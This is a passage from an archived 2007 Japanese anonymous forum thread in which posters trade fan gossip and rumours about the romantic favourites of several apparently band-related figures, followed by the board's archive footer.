あの顔は絶対そう。他にも色々

289 :名無しさん@お腹いっぱい。:2007/02/22(木) 01:29:07 ID:z6x24ycEO
奇人の特徴もとkwsk教えて!

290 :名無しさん@お腹いっぱい。:2007/02/22(木) 08:10:23 ID:gMbHe9m4O
奇人って誰の事??

291 :名無しさん@お腹いっぱい。:2007/02/22(木) 11:48:19 ID:mrM8h86TO
ド新規は知らなくていいからww

292 :名無しさん@お腹いっぱい。:2007/02/23(金) 04:49:23 ID:yTl08/zoO
ってか、康平はアルメリアは真剣だから最近女ネタもないだろ。いい加減僻みはやめれば?
マジレスすまん。

293 :名無しさん@お腹いっぱい。:2007/02/23(金) 05:41:19 ID:8wejm9StO
「アルメリアは」ってw

294 :名無しさん@お腹いっぱい。:2007/02/23(金) 15:55:04 ID:6vGNmdnAO
オキニ話も不安の勘違いかもなw

295 :名無しさん@お腹いっぱい。:2007/02/23(金) 21:32:46 ID:E9tIilZcO
シュンスケとコヘのは勘違いぢゃないよ、某麺から聞いたしw
シュンスケのはまぢで確実w英樹のゎ謎、Mがオキニなのはそれっぽいけどw

55 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)